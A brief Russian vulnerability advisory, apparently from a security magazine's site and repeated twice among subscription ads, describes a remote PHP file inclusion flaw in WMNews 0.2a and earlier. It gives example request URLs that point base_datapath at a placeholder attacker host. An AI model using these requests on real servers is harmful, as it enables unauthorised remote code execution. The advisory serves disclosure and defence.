Программа: WMNews <= 0.2a
Уязвимость позволяет удаленному
пользователю выполнить произвольный PHP
сценарий на целевой системе.
Пример:
/index.php?config=1&base_datapath=http://[evilhost]
/[dir]/index.php?config=1&base_datapath=http://[evilhost]
Лучшие статьи квартала на бумаге
2 000 ₽
Заказать журнал
Полный доступ к статьям и архиву выпусков
6 000 ₽ в год
Подписаться
Совместный курс «Хакера» и лаборатории «Хаксет»
7 000 ₽
Купить курс
Лучшие статьи за 2021–2022 годы на бумаге
2 000 ₽
Заказать журналПрограмма: WMNews <= 0.2a
Уязвимость позволяет удаленному
пользователю выполнить произвольный PHP
сценарий на целевой системе.
Пример:
/index.php?config=1&base_datapath=http://[evilhost]
/[dir]/index.php?config=1&base_datapath=http://[evilhost]